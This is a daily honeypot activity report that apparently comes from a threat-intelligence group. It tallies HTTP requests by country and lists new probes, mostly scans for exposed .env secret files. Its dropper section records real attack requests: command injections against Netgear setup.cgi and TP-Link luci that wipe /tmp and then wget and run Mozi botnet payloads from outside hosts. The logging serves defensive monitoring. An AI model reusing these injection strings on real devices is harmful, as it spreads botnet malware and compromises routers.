Skip to main content
  1. Daily-Posts/

Report: 2025-06-26

·457 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-26
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 31 new requests that have never been observed before (these were added to the monitored request database.).

A total of 716 requests were recorded during the day, originating from 3 different countries, with a peak of 214 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
IDGermany
BRGermany
KRGermany
USGermany
SGGermany
BRGermany
KRGermany
USDubai
PTDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
175.149.79.234GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.149.79.234:46391/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
117.200.81.189GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.200.81.189:33364/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
632GET /cgi-bin/diagnostics.cgi HTTP/1.1
771GET /OdinHttpCall1750911301 HTTP/1.1
1021GET /OdinHttpCall1750925483 HTTP/1.1
1031GET /Odin/http/call1750925483 HTTP/1.1
1041GET /odinhttpcall1750925483 HTTP/1.1
1111GET /Odin/http/call1750911301 HTTP/1.1
1121GET /odinhttpcall1750911301 HTTP/1.1
1261\x00\x0E8\xAF\xF2\xF9\xC2/j.*\x00\x00\x00\x00\x00
1481\x00\x0E\x08\xAF\xF2\xF9\xC2/j.*\x00\x00\x00\x00\x00
2121GET /dev/.env~ HTTP/1.1
2141GET /dev/.env0 HTTP/1.1
2161GET /jest/.env HTTP/1.1
2171GET /helm/.env HTTP/1.1
2181GET /debug.env HTTP/1.1
2221GET /email.env HTTP/1.1
2231GET /env_2.txt HTTP/1.1
2241GET /front.env HTTP/1.1
2251GET /brevo.env HTTP/1.1
2261GET /api/.env0 HTTP/1.1
2271GET /.env_user HTTP/1.1
2291GET /.prod-env HTTP/1.1
2301GET /admin.env HTTP/1.1
2311GET /app/.env~ HTTP/1.1
2321GET /User/.env HTTP/1.1
2331GET /cloud.env HTTP/1.1
2341GET /api/.env~ HTTP/1.1
2351GET /cicd/.env HTTP/1.1
2371GET /build.env HTTP/1.1
2381GET /.env-ssrf HTTP/1.1
2391GET /.env-smtp HTTP/1.1
2401GET /.env_path HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0214US
1115DE
265GB
348PT
445BG
539NL
627JP
724SC
819SG
914CN
109CH
117MD
127HK
136PL
146BE
156BR
165KR
175UA
185TR
195RU
205ZA
214RO
224ID
234FR
243KZ
253AR
262IN
272MC
282IE
292CA
302IL
312AO
322VN
331CZ
341IR
351ES
361CO
371SE
381PH
391MY
401LT

Related

Report: 2025-06-25
·318 words
Repport Daily
Report: 2025-06-24
·327 words
Repport Daily
Report: 2025-06-23
·838 words
Repport Daily